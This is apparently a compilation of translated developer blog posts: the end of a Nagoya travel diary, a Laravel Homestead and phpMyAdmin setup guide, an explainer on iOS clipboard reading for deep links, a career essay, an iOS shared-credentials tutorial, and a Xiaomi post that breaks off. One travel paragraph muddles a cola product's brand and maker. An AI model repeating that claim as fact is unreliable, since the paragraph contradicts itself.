Beware of birds, many pigeons outside, can buy feed to feed the pigeons.
Walked through Osu Shopping Street again, headed back to Meijo Line, towards Atsuta Shrine.
Bought a Benten fruit daifuku to eat on the way, thin and tender skin, plenty of fresh fruit juice, bought two at once! (I think it’s tastier than Rokkakudo XD)
Went to a drugstore in the shopping street and bought some medicines that can be taken on the plane to bring back to Taiwan.
Exiting Atsuta Shrine Station on the Meijo Line, still a bit of a walk to reach the main gate of Atsuta Shrine for worship.
After a simple worship, bought some amulets and left.
The last point is to visit Meitetsu (actually very tired when arriving here).
After a stroll in the underground street, head towards JR GATE TOWER, go up to the Starbucks on the 15th floor where you can enjoy a free view.
Because the outdoor seats were not open due to rain, and the indoor seats were full, I didn’t buy a cup of coffee to sit and rest while enjoying the view; took some photos and then started heading downstairs to Takashimaya Department Store, where there is a Harbs but requires queuing.
Across the street, there is a Sky Promenade in Nagoya, a new observation deck, but I didn’t go because I was tired, needed to buy another ticket, and the weather was not good; by the time I checked if I could still go and the points of interest I was interested in were gone; in the end, I just continued strolling down to the underground street to buy some souvenirs (Frog Hometown); bought a one-way ticket from Nagoya Railway to Chubu Centrair International Airport + uSky train ($271) and returned to the airport.
It was a bit of a shame that it wasn’t even 5:00 PM yet… but going to other attractions again would be too far… and I wanted to avoid the crowd during rush hour.
Took a photo of the real uSky.
The flight is not until 23:15, still a long time to go.
First, try the famous Tebasaki in Nagoya.
There are many things to see at NGO Airport, besides food and drinks inside, there is also a large observation deck where you can see planes take off and land up close! (Terminal 1)
Or go to Terminal 2 first to see the free aircraft museum (it was closed when I went).
There is also a Lawson and a capsule toy store here (but they also have operating hours).
Had dinner at the airport’s Nagoya Udon, Nagoya’s specialty noodles are flat.
The taste was good, but accidentally ordered two main dishes… their tonkatsu was tonkatsu rice XD
After eating, continue waiting for the flight… waiting for the counter to open (opens at 20:45).
Glanced at the clock in the corner and went to queue for departure preparation around 20:00; the airline's carry-on baggage check is quite strict, the rule being two pieces per person with a total weight under 7 kilograms, no turning a blind eye; I saw someone who had simply gone to buy a PS5 and come back, which seemed like a good target for a one-day flash trip.
I only have one bag, so I can carry another one. I happened to buy a bottle of Tanjirou 750 ml back to Taiwan. (5,700 yen, 100 yen more expensive than Tokyo)
Coca-Cola is delicious. If you see it in a supermarket or vending machine, you can buy it and try it out. It is a collaboration between Suntory and Pepsi, not available in Taiwan. It is made like draft beer but as a cola, very fizzy, not too syrupy. I usually end up pouring out regular cola because it’s too sweet, but I can finish a Coca-Cola Life!
Back at the airline's carry-on baggage check, they strictly check that you have only two items; if not, they will ask you to consolidate down to two items on the spot or pay extra.
Due to flight delay, originally scheduled for 23:15, delayed to 23:50; took off around 00:15.
But luckily got a window seat, can have a good sleep.
Studied the onboard facilities after waking up, only then did I realize that flight information, entertainment videos can be viewed by connecting to onboard WiFi with a phone, and ordering can also be done directly with a phone.
Someone ordered something similar to spare ribs chicken noodles to eat, the whole cabin was filled with a delicious smell, very tempting.
Fortunately, got some rest on the plane due to the window seat; feeling okay.
Have to say that transportation in Taiwan is very inconvenient. Taking a red-eye flight to Taoyuan Airport, can only take a scary flat-rate taxi or expensive Uber back to Taipei; if you want to take public transportation, you can only wait for the 4-5 am shuttle.
Later found out that there is also Inuyama Castle in Nagoya, if rearranged, should go to Inuyama Castle first, and didn’t get to eat eel rice!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Setting up a Laravel development environment from scratch and managing MySQL databases with phpMyAdmin GUI
Recently reset my Mac, recording the steps to restore the Laravel development environment.
After downloading and installing both pieces of software (VirtualBox and Vagrant), proceed to the next step of configuration.
During VirtualBox installation, you will be required to restart and go to “Settings” -> “Security & Privacy” -> “Allow VirtualBox” to enable all services.
git clone https://github.com/laravel/homestead.git ~/Homestead
+cd ~/Homestead
+git checkout release
+bash init.sh
+
phpMyAdmin is a PHP-based web-based MySQL database management tool that allows administrators to manage MySQL databases through a web interface. This web interface provides a simpler way to input complex SQL syntax, especially for handling large data imports and exports. — Wiki
Download the latest version from the phpMyAdmin official website.
Unzip the .zip -> Folder -> Rename the folder to “phpMyAdmin”:
Move the phpMyAdmin folder to the ~/Homestead folder:
In the phpMyAdmin folder, find config.sample.inc.php, rename it to config.inc.php, and open it with an editor to modify the settings as follows:
<?php
+/* vim: set expandtab sw=4 ts=4 sts=4: */
+/**
+ * phpMyAdmin sample configuration, you can use it as base for
+ * manual configuration. For easier setup you can use setup/
+ *
+ * All directives are explained in documentation in the doc/ folder
+ * or at <https://docs.phpmyadmin.net/>.
+ *
+ * @package PhpMyAdmin
+ */
+declare(strict_types=1);
+
+/**
+ * This is needed for cookie based authentication to encrypt password in
+ * cookie. Needs to be 32 chars long.
+ */
+$cfg['blowfish_secret'] = ''; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */
+
+/**
+ * Servers configuration
+ */
+$i = 0;
+
+/**
+ * First server
+ */
+$i++;
+/* Authentication type */
+$cfg['Servers'][$i]['auth_type'] = 'config';
+/* Server parameters */
+$cfg['Servers'][$i]['host'] = 'localhost';
+$cfg['Servers'][$i]['user'] = 'homestead';
+$cfg['Servers'][$i]['password'] = 'secret';
+$cfg['Servers'][$i]['compress'] = false;
+$cfg['Servers'][$i]['AllowNoPassword'] = false;
+
+/**
+ * phpMyAdmin configuration storage settings.
+ */
+
+/* User used to manipulate with storage */
+// $cfg['Servers'][$i]['controlhost'] = '';
+// $cfg['Servers'][$i]['controlport'] = '';
+// $cfg['Servers'][$i]['controluser'] = 'pma';
+// $cfg['Servers'][$i]['controlpass'] = 'pmapass';
+
+/* Storage database and tables */
+// $cfg['Servers'][$i]['pmadb'] = 'phpmyadmin';
+// $cfg['Servers'][$i]['bookmarktable'] = 'pma__bookmark';
+// $cfg['Servers'][$i]['relation'] = 'pma__relation';
+// $cfg['Servers'][$i]['table_info'] = 'pma__table_info';
+// $cfg['Servers'][$i]['table_coords'] = 'pma__table_coords';
+// $cfg['Servers'][$i]['pdf_pages'] = 'pma__pdf_pages';
+// $cfg['Servers'][$i]['column_info'] = 'pma__column_info';
+// $cfg['Servers'][$i]['history'] = 'pma__history';
+// $cfg['Servers'][$i]['table_uiprefs'] = 'pma__table_uiprefs';
+// $cfg['Servers'][$i]['tracking'] = 'pma__tracking';
+// $cfg['Servers'][$i]['userconfig'] = 'pma__userconfig';
+// $cfg['Servers'][$i]['recent'] = 'pma__recent';
+// $cfg['Servers'][$i]['favorite'] = 'pma__favorite';
+// $cfg['Servers'][$i]['users'] = 'pma__users';
+// $cfg['Servers'][$i]['usergroups'] = 'pma__usergroups';
+// $cfg['Servers'][$i]['navigationhiding'] = 'pma__navigationhiding';
+// $cfg['Servers'][$i]['savedsearches'] = 'pma__savedsearches';
+// $cfg['Servers'][$i]['central_columns'] = 'pma__central_columns';
+// $cfg['Servers'][$i]['designer_settings'] = 'pma__designer_settings';
+// $cfg['Servers'][$i]['export_templates'] = 'pma__export_templates';
+
+/**
+ * End of servers configuration
+ */
+
+/**
+ * Directories for saving/loading files from server
+ */
+$cfg['UploadDir'] = '';
+$cfg['SaveDir'] = '';
+
+/**
+ * Whether to display icons or text or both icons and text in table row
+ * action segment. Value can be either of 'icons', 'text' or 'both'.
+ * default = 'both'
+ */
+//$cfg['RowActionType'] = 'icons';
+
+/**
+ * Defines whether a user should be displayed a "show all (records)"
+ * button in browse mode or not.
+ * default = false
+ */
+//$cfg['ShowAll'] = true;
+
+/**
+ * Number of rows displayed when browsing a result set. If the result
+ * set contains more rows, "Previous" and "Next".
+ * Possible values: 25, 50, 100, 250, 500
+ * default = 25
+ */
+//$cfg['MaxRows'] = 50;
+
+/**
+ * Disallow editing of binary fields
+ * valid values are:
+ * false allow editing
+ * 'blob' allow editing except for BLOB fields
+ * 'noblob' disallow editing except for BLOB fields
+ * 'all' disallow editing
+ * default = 'blob'
+ */
+//$cfg['ProtectBinary'] = false;
+
+/**
+ * Default language to use, if not browser-defined or user-defined
+ * (you find all languages in the locale folder)
+ * uncomment the desired line:
+ * default = 'en'
+ */
+//$cfg['DefaultLang'] = 'en';
+//$cfg['DefaultLang'] = 'de';
+
+/**
+ * How many columns should be used for table display of a database?
+ * (a value larger than 1 results in some information being hidden)
+ * default = 1
+ */
+//$cfg['PropertiesNumColumns'] = 2;
+
+/**
+ * Set to true if you want DB-based query history.If false, this utilizes
+ * JS-routines to display query history (lost by window close)
+ *
+ * This requires configuration storage enabled, see above.
+ * default = false
+ */
+//$cfg['QueryHistoryDB'] = true;
+
+/**
+ * When using DB-based query history, how many entries should be kept?
+ * default = 25
+ */
+//$cfg['QueryHistoryMax'] = 100;
+
+/**
+ * Whether or not to query the user before sending the error report to
+ * the phpMyAdmin team when a JavaScript error occurs
+ *
+ * Available options
+ * ('ask' | 'always' | 'never')
+ * default = 'ask'
+ */
+//$cfg['SendErrorReports'] = 'always';
+
+/**
+ * You can find more configuration options in the documentation
+ * in the doc/ folder or at <https://docs.phpmyadmin.net/>.
+ */
+
Mainly add and modify these three settings:
$cfg['Servers'][$i]['auth_type'] = 'config';
+$cfg['Servers'][$i]['user'] = 'homestead';
+$cfg['Servers'][$i]['password'] = 'secret';
+
The default MySQL username and password for Homestead are homestead / secret.
Open the ~/Homestead/Homestead.yaml configuration file with an editor.
---
+ip: "192.168.10.10"
+memory: 2048
+cpus: 2
+provider: virtualbox
+
+authorize: ~/.ssh/id_rsa.pub
+
+keys:
+ - ~/.ssh/id_rsa
+
+folders:
+ - map: ~/Projects/Web
+ to: /home/vagrant/code
+ - map: ~/Homestead/phpMyAdmin
+ to: /home/vagrant/phpMyAdmin
+
+sites:
+ - map: phpMyAdmin.test
+ to: /home/vagrant/phpMyAdmin
+
+databases:
+ - homestead
+
+features:
+ - mysql: false
+ - mariadb: false
+ - postgresql: false
+ - ohmyzsh: false
+ - webdriver: false
+
+#services:
+# - enabled:
+# - "postgresql@12-main"
+# - disabled:
+# - "postgresql@11-main"
+
+# ports:
+# - send: 50000
+# to: 5000
+# - send: 7777
+# to: 777
+# protocol: udp
+
- ip: the default is 192.168.10.10; you can change it or leave it as is.
- provider: the default is virtualbox; it only needs to be changed if you use Parallels.
- folders: add the mapping - map: ~/Homestead/phpMyAdmin with to: /home/vagrant/phpMyAdmin.
- sites: add the site - map: phpMyAdmin.test with to: /home/vagrant/phpMyAdmin.
If you already have a Laravel project, you can also add it here. For example, I put my projects under ~/Projects/Web, so I also added that directory mapping.
Use Finder -> Go -> /etc/hosts, find the hosts file, and copy it to the desktop (because it cannot be modified directly).
The domain name can be customized as you like, as only your local machine can access it.
Open the copied Hosts file and add the sites record:
<homestead IP address> <domain name>
+
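For example, with the default Homestead IP and the phpMyAdmin site mapped above, the added line would be:
192.168.10.10 phpmyadmin.test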
After modifying, save it, then cut and paste it back to /etc/hosts, overwriting the original file.
cd ~/Homestead
+vagrant up --provision
+
⚠️ Please note that if you do not add --provision, the configuration file will not be updated, and you will get a "no input file specified" error when entering the URL.
The first time you start it, you need to download the Homestead environment package, which takes a long time.
If no special errors occur, it means the startup was successful. You can then run:
vagrant ssh
+
ssh into the virtual machine.
Go to http://phpmyadmin.test/ to check if it opens normally.
Success! Whenever we need to work on the database, we can just come here and modify it directly.
If you have an existing project, you can already run it locally from the browser at this step. If not, here is how to create a new Laravel project.
cd ~/Homestead
+vagrant ssh
+
SSH into the VM, then cd to the code directory:
cd ./code
+
Run laravel new followed by the project name to create a Laravel project (using blog as an example):
laravel new blog
+
The blog project has been successfully created!
Go back and open the ~/Homestead/Homestead.yaml configuration file.
Add a record in sites:
sites:
+ - map: myblog.test
+ to: /home/vagrant/code/blog/public
+
Remember to add a corresponding record in hosts:
192.168.10.10 myblog.test
+
Finally, restart homestead:
vagrant reload --provision
+
Enter http://myblog.test in the browser to test if it is correctly set up and running:
Done!
Although using Homestead means you don’t need to install Composer separately, considering that some PHP projects may not use Laravel, you still need to install Composer locally.
Copy the command from the download section and replace the php composer-setup.php line with:
php composer-setup.php --install-dir=/usr/local/bin --filename=composer
+
Composer v2.0.9 example:
php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
+php -r "if (hash_file('sha384', 'composer-setup.php') === '756890a4488ce9024fc62c56153228907f1545c228516cbf63f885e036d37e9a59d27d63f46af1d4d07ee0f76181c7d3') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;"
+php composer-setup.php --install-dir=/usr/local/bin --filename=composer
+php -r "unlink('composer-setup.php');"
+
Enter the commands sequentially in the terminal.
⚠️Please note not to directly copy and use the above example, as the hash check code will change with Composer version updates.
Enter composer -V to confirm the version and that the installation succeeded!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Why do so many iOS apps read your clipboard?
Photo by Clint Patterson
Starting from iOS ≥ 16, if the user does not actively perform a paste action, a prompt will appear when an app attempts to read the clipboard. The user must click allow for the app to access the clipboard information.
UIPasteBoard’s privacy change in iOS 16
Top prompt message when the clipboard is read by an app
Starting from iOS 14, users are notified when an app reads their clipboard. This has caused significant privacy concerns, especially with apps from China, which already have a notorious reputation. The media has amplified these concerns, leading to widespread panic. However, it’s not just Chinese apps; many apps from the US, Taiwan, Japan, and around the world have been found to read the clipboard. So why do so many apps need to read the clipboard?
Google Search
The clipboard may contain personal information or even passwords, such as those copied from password managers like 1Password or LastPass. Apps that can read the clipboard can potentially send this information back to their servers, depending on the developer’s integrity. To investigate, one can use man-in-the-middle sniffing to monitor the data being sent back to the app’s servers to see if it includes clipboard information.
The Clipboard API has been available since iOS 3 in 2009. It wasn’t until iOS 14 that a prompt was added to notify users. Over the past decade, malicious apps could have already collected enough data.
Why do so many apps, both domestic and international, read the clipboard when opened?
First, let’s define the situation: I’m referring to “when the app is opened”, not when the app is actively being used. Reading the clipboard during app usage is more related to app functionality, such as Google Maps automatically pasting a copied address. However, some apps may continuously steal clipboard information.
“A kitchen knife can be used to cut vegetables or to kill, depending on what the person using it intends to do.”
The main reason the APP reads the clipboard when opened is to enhance the user experience through “ iOS Deferred Deep Link “, as shown in the process above. When a product offers both a web version and an APP, we prefer users to install the APP (as it has higher engagement). Therefore, when users browse the web version, they are guided to download the APP. We hope that after downloading and opening the APP, it will automatically open the page where the user left off on the web.
EX: When I browse the PxHome mobile web version on Safari -> see a product I like and want to buy -> PxHome wants to direct traffic to the APP -> download the APP -> open the APP -> display the product I saw on the web.
If we don’t do this, users can only 1. Go back to the web and click again, or 2. Search for the product again in the APP. Both options increase the difficulty and hesitation time for users to make a purchase, which might result in them not buying at all!
From an operational perspective, knowing the source of successful installations is very helpful for marketing and advertising budget allocation.
This is a cat-and-mouse game because Apple does not want developers to have a way to track user sources. Before iOS 9, the method was to store information in web cookies and read them after the APP was installed. After iOS 10, Apple blocked this method. With no other options, everyone resorted to the final technique — “using the clipboard to transmit information.” iOS 14 introduced a new feature that alerts users, making developers awkward.
Another method is using Branch.io to record user profiles (IP, phone information) and then match the information. This is theoretically feasible but requires a lot of manpower (involving backend, database, APP) to research and implement, and it may result in misjudgments or collisions.
*Android Google supports this feature natively, without the need for such workarounds.
Many APP developers may not know they also have clipboard privacy issues because Google’s Firebase Dynamic Links service uses the same principle:
// Reason for this string to ensure that only FDL links, copied to clipboard by AppPreview Page
+// JavaScript code, are recognized and used in copy-unique-match process. If user copied FDL to
+// clipboard by himself, that link must not be used in copy-unique-match process.
+// This constant must be kept in sync with constant in the server version at
+// durabledeeplink/click/ios/click_page.js
+
Therefore, any APP using Google’s Firebase Dynamic Links service may have clipboard privacy issues!
There are security issues, but it boils down to trust. Trust that developers are doing the right thing. If developers want to do evil, there are more effective ways, such as stealing credit card information or recording real passwords.
The purpose of the alert is to let users notice when the clipboard is being read. If it’s unreasonable, be cautious!
Q: “TikTok responded that accessing the clipboard is to detect spam behavior.” Is this statement correct?
A: I personally think it's just an excuse to appease public opinion. What TikTok means is "to prevent users from copying and pasting ad messages everywhere." But that check could be done when a message is composed or sent; there is no need to constantly monitor the user's clipboard. Why would they need to police whether my clipboard contains ads or "sensitive" information when I haven't even pasted or posted anything yet?
If you don’t have a spare device to upgrade to iOS 14 for testing, you can download XCode 12 from Apple and test it using the simulator.
Everything is still very new. If you are using Firebase, you can refer to Firebase-iOS-SDK/Issue #5893 and update to the latest SDK.
If you are implementing DeepLink yourself, you can refer to the modifications in Firebase-iOS-SDK #PR 5905:
Swift:
if #available(iOS 10.0, *) {
+ if (UIPasteboard.general.hasURLs) {
+ //UIPasteboard.general.string
+ }
+} else {
+ //UIPasteboard.general.string
+}
+
Objective-C:
if (@available(iOS 10.0, *)) {
+ if ([[UIPasteboard generalPasteboard] hasURLs]) {
+ //[UIPasteboard generalPasteboard].string;
+ }
+ } else {
+ //[UIPasteboard generalPasteboard].string;
+ }
+ return pasteboardContents;
+}
+
First, check if the clipboard content is a URL (in line with the content copied by web JavaScript being a URL with parameters). If it is, then read it, so the clipboard won’t be read every time the app is opened.
Currently, this is the only way. The prompt will still appear, but it will be more focused.
Additionally, Apple has introduced a new API: DetectPattern to help developers more accurately determine if the clipboard information is what we need, then read it and prompt, making users feel more secure while developers can continue to use this feature.
At the time of writing, DetectPattern is still in beta and can only be called from Objective-C.
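For reference, here is a minimal sketch of the detection flow, assuming the Swift interface (UIPasteboard.DetectionPattern and detectPatterns(for:completionHandler:)) that became available in the released iOS 14 SDK; treat the exact names as assumptions if your SDK differs:
import UIKit

func readPasteboardIfRelevant(completion: @escaping (String?) -> Void) {
    let pasteboard = UIPasteboard.general
    // Detection only checks the kind of content; it does not read it,
    // so it does not trigger the paste banner.
    pasteboard.detectPatterns(for: [.probableWebURL]) { result in
        switch result {
        case .success(let patterns) where patterns.contains(.probableWebURL):
            // Only now do we actually read the clipboard; the banner appears,
            // but only when the content looks like what we need.
            DispatchQueue.main.async { completion(pasteboard.string) }
        default:
            DispatchQueue.main.async { completion(nil) }
        }
    }
}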
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
The life opportunity from stepping into the information field to switching to iOS APP development
Bangkok 2018 - Z Realm — You are not alone on the road to solving problems
Time flies, it’s been a year since I switched from Back End to developing Mobile iOS APPs, and a month since I started writing on Medium. For this 10th small milestone, let me write about my experience of breaking through and switching tracks.
“The instinct to explore drives great human achievements.” From Columbus exploring the oceans and discovering new continents, the Wright brothers improving airplanes to conquer the skies, to now leaving Earth to explore outer space; only by being passionate about new things can we continuously surpass ourselves. Perhaps we cannot be as great as Armstrong, but as he said, “One small step for a man, one giant leap for mankind.” Do not underestimate your creativity and talents.
When opportunities come, grasp them well, because there is no guarantee of a second chance. You might hesitate, thinking the next one might be better or fearing you made the wrong decision, but who knows whether tomorrow or an accident will arrive first? If there are no negative impacts, then open your arms and seize the opportunity!
Going back to 2009, when I just entered the first year of high school at Chang Kung Comprehensive High School, I learned by chance that the school was training students to participate in competitions. My initial thought was, “Since there’s nothing to do at home, why not learn something?” So I signed up and joined; this was the first turning point in my life, stepping into the information field. Joining the training was tough, practicing every day after school, on weekends, and during winter and summer vacations for three years. The risk was high; if you didn’t place in the competition, you almost got nothing. But looking back, I’m glad I seized this opportunity (I’ll share more about the journey of being a contestant later).
National Skills Competition - Ministry of Labor Workforce Development Agency
This opportunity taught me many skills for making a living, such as design tools like Illustrator/Photoshop/Flash, and engineering tools like PHP/MySQL/HTML/CSS/JavaScript/jQuery. I also got admitted to National Taiwan University of Science and Technology through the competition champion qualification. Looking back, I’m really glad I seized this opportunity!
Fast forward to 2017, after graduating from university, I entered the workforce as a back-end engineer. In terms of web development, I mainly specialized in back-end (Laravel) during university, and didn’t research much on the front-end, using ready-made frameworks (Bootstrap/Semantic UI).
At this point, I hit a bottleneck, being in the same field for too long without any breakthrough development. So I set new goals for myself:
At this time, another opportunity appeared. The project I joined was about to start developing a mobile platform application. Initially, my plan was to write the API back-end, using Laravel with some new technologies, which would also be a kind of breakthrough for me. Here, I must mention that when making decisions, you should look far ahead. My initial choice to continue with the back-end was due to inertia and the high perceived cost of stepping into a new field, as I didn’t have a Mac and it was a completely new area. Fortunately, with my supervisor’s guidance, I eventually chose to step into iOS APP development.
Now, in 2018, it’s been exactly a year since I started developing iOS APPs. The gains include learning a new language, Swift, iOS APP development, the sense of achievement from launching my own APP, and starting to write on Medium. I’m glad I seized this opportunity, as it opened another window for my career!
“Isn’t programming all the same?” Switching fields is like switching mountains…
Having someone guide you initially can speed things up because many concepts are quite different from web development. You’ll go through a period of hitting walls, but hang in there! You’ll see the light of success!
I myself hit walls for almost a month. After getting a bit of a grasp, you’ll encounter the second wall period. At this point, you need to become more resilient, learn from mistakes, and trade time for experience (if you don’t have enough time, consider taking an introductory course or finding a mentor).
For example, to show a list on the web I could simply output a <table> and run a PHP loop to display the data; but in an app, you need to use the UITableView component to implement it (I remember laying it out with plain UIViews and happily telling my supervisor I was done, only to find it caused a huge memory explosion). Other aspects like memory leaks also need more attention!
Five stars warm the heart, one star breaks it.
Life is interesting because of its uncertainties. For the opportunities that come, if you choose to seize them, you’ll gain something; if you choose to let go, the next opportunity might be better. There’s no right or wrong. Just trust your intuition: “Choose what you love, love what you choose.”
Currently still a novice, I will continue to delve into iOS app development, learning and growing towards the future, seeking breakthroughs, and maintaining the habit of writing on Medium. What will the next opportunity be? I’m looking forward to it!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A feature more worthwhile than Sign in with Apple
Photo by Dan Nelson
One of the most common problems in services that have both a website and an app is that users register and log in on the website, with passwords remembered; but when guided to install the app, they find it very inconvenient to re-enter their account and password from scratch. This feature allows the existing account and password on the phone to be automatically filled into the app associated with the website, speeding up the user login process.
Without further ado, here is the completed effect diagram; at first glance, you might think it’s the iOS ≥ 11 Password AutoFill feature; but please look carefully, the keyboard did not pop up, and I clicked the “Choose Saved Password” button to bring up the account and password selection window.
Since Password AutoFill is mentioned, let me first introduce Password AutoFill and how to set it up!
Support: iOS ≥ 11
By now, iOS 14, this feature is very common and nothing special; on the account and password login page in the app, when the keyboard is called up for input, you can quickly select the account and password of the web version service, and after selection, it will be automatically filled in for quick login!
Associated Domains! We specify Associated Domains in the app and upload the apple-app-site-association file on the website, and they can recognize each other.
1. In the project settings “Signing & Capabilities” -> Top left “+ Capabilities” -> “Associated Domains”
Add webcredentials:your website domain (e.g., webcredentials:google.com).
2. Go to Apple Developer Console
In the “Membership” tab, record the “Team ID”.
3. Go to “Certificates, Identifiers & Profiles” -> “Identifiers” -> Find your project -> Enable the “Associated Domains” feature
App-side settings completed!
4. Web Site Configuration
Create a file named “apple-app-site-association” (without an extension), edit it with a text editor, and enter the following content:
{
  "webcredentials": {
    "apps": [
      "TeamID.BundleId"
    ]
  }
}
Replace TeamID.BundleId with your project settings (e.g., TeamID = ABCD, BundleID = li.zhgchg.demoapp => ABCD.li.zhgchg.demoapp).
Upload this file to the website’s root directory or the /.well-known directory. Assuming your webcredentials website domain is set to google.com, this file should be accessible at google.com/apple-app-site-association or google.com/.well-known/apple-app-site-association.
Note: Subdomains
According to the official documentation, if there are subdomains, they must all be listed in the Associated Domains.
Web Configuration Complete!
Note: applinks. It has been observed that if a universal link (applinks) is already set up, the webcredentials entry is not strictly required for this to work. However, we will follow the documentation to avoid potential issues in the future.
For the code part, we only need to set the TextField as follows:
usernameTextField.textContentType = .username
passwordTextField.textContentType = .password
If it is a new registration, the password confirmation field can use:
repeatPasswordTextField.textContentType = .newPassword
After rebuilding and running the app, the option to use saved passwords from the same website will appear above the keyboard when entering the account.
If the option does not appear, it might be because the AutoFill Passwords feature is not enabled (it is disabled by default in the simulator). Go to “Settings” -> “Passwords” -> “AutoFill Passwords” -> enable “AutoFill Passwords”.
Alternatively, the website might not have any existing passwords. You can add one in “Settings” -> “Passwords” -> Top right corner “+” -> Add.
After introducing Password AutoFill, let’s move on to the main topic: how to achieve the effect shown in the illustration.
Introduced in iOS 8.0, although rarely seen in apps before Password AutoFill was released, this API can integrate website account passwords for quick user selection.
Shared Web Credentials can not only read account passwords but also add, modify, and delete stored account passwords.
⚠️ The configuration part must also set up Associated Domains, as mentioned in the Password AutoFill setup.
So it can be said to be an enhanced version of the Password AutoFill feature!!
Because the environment required for Password AutoFill must be set up first to use this “advanced” feature.
Reading is done using the SecRequestSharedWebCredential method:
SecRequestSharedWebCredential(nil, nil) { (credentials, error) in
    guard error == nil, let credentials = credentials else {
        DispatchQueue.main.async {
            //alert error
        }
        return
    }

    guard CFArrayGetCount(credentials) > 0,
          let dict = unsafeBitCast(CFArrayGetValueAtIndex(credentials, 0), to: CFDictionary.self) as? Dictionary<String, String>,
          let account = dict[kSecAttrAccount as String],
          let password = dict[kSecSharedPassword as String] else {
        DispatchQueue.main.async {
            //alert error
        }
        return
    }

    DispatchQueue.main.async {
        //fill account, password to textfield
    }
}
SecRequestSharedWebCredential(fqdn, account, completionHandler): for fqdn you can specify one of your webcredentials domains, or pass nil to not specify one.
Effect image. (You may notice it is different from the initial effect image.)
⚠️ This method has been marked as Deprecated in iOS 14!
⚠️ This method has been marked as Deprecated in iOS 14!
⚠️ This method has been marked as Deprecated in iOS 14!
"Use ASAuthorizationController to make an ASAuthorizationPasswordRequest (AuthenticationServices framework)"
This method is only applicable for iOS 8 ~ iOS 14. After iOS 13, you can use the same API as Sign in with Apple — AuthenticationServices
Support iOS ≥ 13
import AuthenticationServices

class ViewController: UIViewController {
    override func viewDidLoad() {
        super.viewDidLoad()
        //...
        let request: ASAuthorizationPasswordRequest = ASAuthorizationPasswordProvider().createRequest()
        let controller = ASAuthorizationController(authorizationRequests: [request])
        controller.delegate = self
        controller.performRequests()
        //...
    }
}

extension ViewController: ASAuthorizationControllerDelegate {
    func authorizationController(controller: ASAuthorizationController, didCompleteWithAuthorization authorization: ASAuthorization) {
        if let credential = authorization.credential as? ASPasswordCredential {
            // fill credential.user, credential.password to textfield
        }
        // else if as? ASAuthorizationAppleIDCredential... sign in with apple
    }

    func authorizationController(controller: ASAuthorizationController, didCompleteWithError error: Error) {
        // alert error
    }
}
Effect image, you can see that the new method integrates better with Sign in with Apple in terms of process and display.
⚠️ This login cannot replace Sign in with Apple (they are different things).
Only the reading part is deprecated, the parts for adding, deleting, and editing can still be used as usual.
The parts for adding, deleting, and editing use the SecAddSharedWebCredential method.
SecAddSharedWebCredential(domain as CFString, account as CFString, password as CFString?) { (error) in
    DispatchQueue.main.async {
        guard error == nil else {
            // alert error
            return
        }
        // alert success
    }
}
SecAddSharedWebCredential(fqdn, account, password, completionHandler): fqdn is one of your webcredentials domains, and passing nil as the password deletes the stored credential.
⚠️ Additionally, you cannot modify in the background secretly; a prompt will appear each time you modify, asking the user to confirm by clicking “Update Password” to actually change the data.
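For example, a minimal sketch of removing a stored credential by reusing SecAddSharedWebCredential with a nil password (the domain and account here are placeholders):
// Passing nil as the password removes the stored shared credential;
// the system still asks the user to confirm the change.
SecAddSharedWebCredential("zhgchg.li" as CFString, "user@zhgchg.li" as CFString, nil) { (error) in
    DispatchQueue.main.async {
        guard error == nil else {
            // alert error
            return
        }
        // alert success: credential removed
    }
}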
The last small feature, the password generator.
Use the SecCreateSharedWebCredentialPassword() method:
let password = SecCreateSharedWebCredentialPassword() as String? ?? ""
The generated password consists of uppercase and lowercase English letters and numbers, using “-“ as a separator (e.g., Jpn-4t2-gaF-dYk).
If you use third-party password management tools (e.g., 1Password, LastPass), you might notice that while Password AutoFill on the keyboard supports displaying and filling them, they do not show up in AuthenticationServices or SecRequestSharedWebCredential. It’s unclear whether this can be achieved.
Thank you for reading, and thanks to saiday and StreetVoice for letting me know about this feature XD.
Also, Xcode ≥ 12.5 simulators have added recording and GIF saving features, which are super useful!
Press “Command” + “R” on the simulator to start recording, click the red dot to stop recording; right-click on the preview image that slides out from the bottom right -> “Save as Animated GIF” to save it as a GIF and directly paste it into the article!
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Newly purchased Xiaomi Air Purifier 3 & recording the linkage issues between Mi Home and Xiao Ai Speaker
This is the fourth article about Xiaomi; recently added a new member — “Xiaomi Air Purifier 3” Honestly, I never cared about the air quality in my room. Seeing the foggy outdoor air always made me a bit worried, and since I have long-term nasal allergies, I decided to buy one for my room!
The new generation has a small screen on the main unit that shows the remaining filter usage time, current air quality, and operation mode selection. It can be used without connecting to the APP; if connected to the APP, it can be controlled remotely, but there are no other special functions.
After two weeks of use, I found that the air quality in the room is quite good; when the outdoor air is good, the indoor air quality value is around 001~006; when the outdoor air is bad, the indoor value is about 008~015; values over 75 are considered poor air quality, and over 150 is considered severe; I should have bought a vacuum cleaner instead XD But having a small air guardian at home is also quite nice.
The Mi Home APP has two regions to choose from: Taiwan and China; the region selection affects the functions within the APP. When setting it up initially, I chose the China region, thinking that data is not safe in any region, so I might as well choose the one with more functions to play with.
After adding the Xiao Ai Speaker last year, I noticed a more complex issue with region selection; if you want to control Mi Home smart appliances from the Xiao Ai Speaker, both APPs must be set to the same region, otherwise, they cannot be linked. This is quite troublesome because if the Xiao Ai Speaker is set to Taiwan, it can pair with KKBOX but the smart functions are a stripped-down version (missing Xiao Ai training).
Therefore, my Xiao Ai Speaker was originally set to the China region. I didn’t encounter any problems when adding previously purchased appliances, and finally, I was able to establish a complete smart home process: saying goodbye to Xiao Ai when leaving would automatically turn off all appliances and turn on the door camera; saying I’m home would automatically turn on the appliances. The experience was quite smooth!
Left: Taiwan/Right: China
Having bought so many Xiaomi home products, the new member must also join my Mi Home APP! However, I encountered a problem when adding it; the Taiwan version of the Xiaomi Air Purifier 3 could not be added to my Mi Home APP. I had to switch the Mi Home APP region back to Taiwan to add it…
